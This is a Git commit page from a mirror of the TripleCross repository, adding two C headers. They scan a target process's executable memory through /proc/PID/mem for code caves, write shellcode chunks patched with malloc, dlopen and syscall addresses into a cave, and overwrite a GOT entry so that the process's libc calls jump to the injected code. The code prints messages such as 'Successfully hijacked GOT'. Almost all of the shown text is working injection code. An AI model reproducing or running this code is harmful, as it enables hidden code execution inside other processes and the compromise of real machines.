admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-27 11:53:09 +08:00
Code Issues Packages Projects Releases Wiki Activity

Merged master and develop, now all changes together. Fully tested and working.

Browse Source
This commit is contained in:
h3xduck
2022-05-15 20:46:35 -04:00
parent 57f3edd8fa aca4cc4cfb
commit 4a292f0f7a
80 changed files with 15780 additions and 48 deletions
Download Patch File Download Diff File Expand all files Collapse all files

123
src/user/include/utils/mem/code_caver.h Normal file
View File

@@ -0,0 +1,123 @@
#ifndef __MEM_CODE_CAVER_H
#define __MEM_CODE_CAVER_H
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "../common/constants.h"
#define CODE_CAVE_LENGTH_BYTES 0x40
#define NULL_BYTE 0x00
__u64 cave_find(int mem_fd, int cave_length, __u64 from, __u64 to){
int null_counter = 0;
lseek(mem_fd, from, SEEK_SET);
for(__u64 ii = from; ii<to; ii++){
char c;
read(mem_fd, &c, 1);
if(c == NULL_BYTE){
null_counter++;
}else{
null_counter = 0;
}
if(null_counter >= CODE_CAVE_LENGTH_BYTES){
printf("Found code cave at %llx\n", ii);
return ii;
}
}
printf("Cave not found between %llx and %llx\n", from, to);
return 0;
}
__u64 code_cave_find_address(int mem_fd, __u64 from, __u64 to, char flags[], __u32 pgoff, __u32 major, __u32 minor, __u64 ino){
__u64 cave_addr;
cave_addr = cave_find(mem_fd, CODE_CAVE_LENGTH_BYTES, from, to);
return cave_addr;
}
int code_cave_write_shellcode(int mem_fd, __u64 cave_addr, __u64 got_addr, __u64 malloc_addr, __u64 dlopen_addr, __u64 syscall_addr){
//Writing the code cave address in the GOT section, future calls to libc will be redirected
size_t len = sizeof(__u64);
__u64 buf_n = (__u64)cave_addr;
lseek(mem_fd, got_addr, SEEK_SET);
for(size_t ii=0; ii<len; ii++){
if(write(mem_fd, (void*)&buf_n+ii, 1) < 0 ){
perror("Error while writing at GOT");
return -1;
}
}
//First part of shellcode
len = CODE_CAVE_SHELLCODE_ASSEMBLE_1_LEN;
char* buf_c = CODE_CAVE_SHELLCODE_ASSEMBLE_1;
lseek(mem_fd, cave_addr, SEEK_SET);
for(size_t ii=0; ii<len; ii++){
if(write(mem_fd, (void*)buf_c+ii, 1) < 0 ){
perror("Error while writing shellcode 1");
return -1;
}
}
//Writing malloc address
len = sizeof(__u64);
buf_n = (__u64)malloc_addr;
for(size_t ii=0; ii<len; ii++){
if(write(mem_fd, (void*)&buf_n+ii, 1) < 0 ){
perror("Error while writing malloc address");
return -1;
}
}
//Second part of shellcode
len = CODE_CAVE_SHELLCODE_ASSEMBLE_2_LEN;
buf_c = CODE_CAVE_SHELLCODE_ASSEMBLE_2;
for(size_t ii=0; ii<len; ii++){
if(write(mem_fd, (void*)buf_c+ii, 1) < 0 ){
perror("Error while writing shellcode 2");
return -1;
}
}
//Writing dlopen address
len = sizeof(__u64);
buf_n = (__u64)dlopen_addr;
for(size_t ii=0; ii<len; ii++){
if(write(mem_fd, (void*)&buf_n+ii, 1) < 0 ){
perror("Error while writing dlopen address");
return -1;
}
}
//Third part of shellcode
len = CODE_CAVE_SHELLCODE_ASSEMBLE_3_LEN;
buf_c = CODE_CAVE_SHELLCODE_ASSEMBLE_3;
for(size_t ii=0; ii<len; ii++){
if(write(mem_fd, (void*)buf_c+ii, 1) < 0 ){
perror("Error while writing shellcode 3");
return -1;
}
}
//A trick to jump to a selected location
len = sizeof(__u64);
buf_n = (__u64)syscall_addr;
for(size_t ii=0; ii<len; ii++){
if(write(mem_fd, (void*)&buf_n+ii, 1) < 0 ){
perror("Error while writing syscall address");
return -1;
}
}
printf("Finished writing shellcode at %llx, syscall_addr %llx\n", cave_addr, syscall_addr);
return 0;
}
#endif

71
src/user/include/utils/mem/injection.h Normal file
View File

@@ -0,0 +1,71 @@
#ifndef __MEM_INJECTION_EXT_H
#define __MEM_INJECTION_EXT_H
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <sys/stat.h>
#include <fcntl.h>
#include "../common/constants.h"
#include "../common/map_common.h"
#include "code_caver.h"
int manage_injection(const struct rb_event* event){
char mem_file_name[100];
__u64 buf = (__u64)CODE_CAVE_ADDRESS_STATIC;
int mem_fd;
memset( (void*)mem_file_name, 0, 100);
printf("Injecting at PID %d at %llx\n", event->pid, event->got_address);
sprintf(mem_file_name, "/proc/%d/mem", event->pid);
mem_fd = open(mem_file_name, O_RDWR);
//lseek(mem_fd, event->got_address, SEEK_SET);
/*for(int ii=0; ii<sizeof(__u64); ii++){
if(write(mem_fd, (void*)&buf+ii, 1) < 0 ){
perror("Error while writing at GOT");
return -1;
}
}*/
//Parsing /proc/pid/maps.
//Note that addresses usually appear as 32-bit when catting, but this is not completely true, 0s are ommitted
//Considering them as 64-bit
char *maps_file = calloc(512, sizeof(char));
FILE *f;
sprintf(maps_file, "/proc/%d/maps", event->pid);
f = fopen(maps_file, "rt");
while (fgets(maps_file, 512, f)) {
__u32 pgoff, major, minor;
__u64 from, to, ino;
char flags[4];
sscanf(maps_file, "%llx-%llx %4c %x %x:%x %llu ", &from, &to, flags, &pgoff, &major, &minor, &ino);
printf("MAPS: %s\n", maps_file);
//Parse flags, find executable one
if(flags[2] == 'x'){
//Candidate for code cave finding
__u64 cave_addr = code_cave_find_address(mem_fd, from, to, flags, pgoff, major, minor, ino);
if(cave_addr!=0){
//Found valid cave.
if(code_cave_write_shellcode(mem_fd, cave_addr, event->got_address, event->libc_malloc_address, event->libc_dlopen_mode_address, event->syscall_address)<0){
printf("Continuing with next cave candidate. Some writes might have been performed already\n");
}
printf("Successfully hijacked GOT\n");
break;
}
}
}
free(maps_file);
close(mem_fd);
return 0;
}
#endif